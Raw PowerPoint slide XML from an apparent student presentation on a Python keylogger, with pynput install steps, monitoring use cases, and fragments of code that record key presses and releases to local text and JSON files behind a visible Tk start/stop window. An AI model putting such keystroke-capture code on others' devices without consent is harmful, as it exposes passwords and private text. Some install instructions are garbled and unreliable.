              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>First we install the python ide and then we install the two packages.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>First one is pip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>pynput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> install.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Next one is johns library.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Then these two are used for controlling mouse and keyboard.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>So we can use for keylogger security.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0"/>
              <a:t>Above like that you can install it in command prompt.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0"/>
              <a:t>By these two libraries we cannot get error in python code.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11353418" y="6473337"/>
            <a:ext cx="151129" cy="191770"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1100" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="2D936B"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Trebuchet MS" panose="020B06030202020202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5"/>
              </a:spcBef>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr lang="en-IN" spc="10" smtClean="0"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="3215622"/>
            <a:ext cx="1699407" cy="213378"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4242699" y="3249914"/>
            <a:ext cx="2088061" cy="14479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7010400" y="135340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72083" y="793340"/>
            <a:ext cx="10681335" cy="632224"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16510" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" spc="25" dirty="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0"/>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="20" dirty="0"/>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-235" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-10" dirty="0"/>
              <a:t>AR</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="15" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-35" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-10" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-15" dirty="0"/>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="15" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-35" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="30" dirty="0"/>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="15" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-45" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="10" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-25" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-10" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="5" dirty="0"/>
              <a:t>S?</a:t>
            </a:r>
            <a:endParaRPr sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546669" y="2240668"/>
            <a:ext cx="8897368" cy="3016210"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Parents might use a keylogger to monitor a child's screen time.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t> Companies often use keylogger software as part of employee monitoring software to help track employee productivity.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t> Information technology departments can use keylogger software to troubleshoot issues on a device.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11353418" y="6473337"/>
            <a:ext cx="151129" cy="191770"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1100" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="2D936B"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Trebuchet MS" panose="020B06030202020202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5"/>
              </a:spcBef>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr lang="en-IN" spc="10" smtClean="0"/>
            </a:fld>
            <a:endParaRPr spc="10" dirty="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400050" y="154436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7310437" y="118352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sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="2209800"/>
            <a:ext cx="5486400" cy="4001095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>tk</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t> import *</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>pynput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t> import keyboard</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>json</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t> = []</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>flag = False</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>keys = ""</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>generate_text_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>(key):</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>    with open('key_log.txt', "w+") as keys:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>keys.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>(key)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11353418" y="6473337"/>
            <a:ext cx="151129" cy="191770"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1100" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="2D936B"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Trebuchet MS" panose="020B06030202020202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5"/>
              </a:spcBef>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr lang="en-IN" spc="10" smtClean="0"/>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5232202"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>(key):</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>    global flag, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>, keys</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>        {'Released': f'{key}'}</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>    )</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>    if flag == True:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>        flag = False</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>    keys = keys + str(key)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>generate_text_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>(str(keys))</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>():</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>    global listener</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>keyboard.Listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>listener.start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>()</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219200"/>
            <a:ext cx="10681335" cy="4431983"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>start_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>(state='disabled')</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>stop_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>(state='normal')</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>():</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>    global listener</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>listener.stop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>(text="Keylogger stopped.")</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>start_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>(state='normal')</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>stop_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>(state='disabled')</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>root = Tk()</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>root.title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>("Keylogger")</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
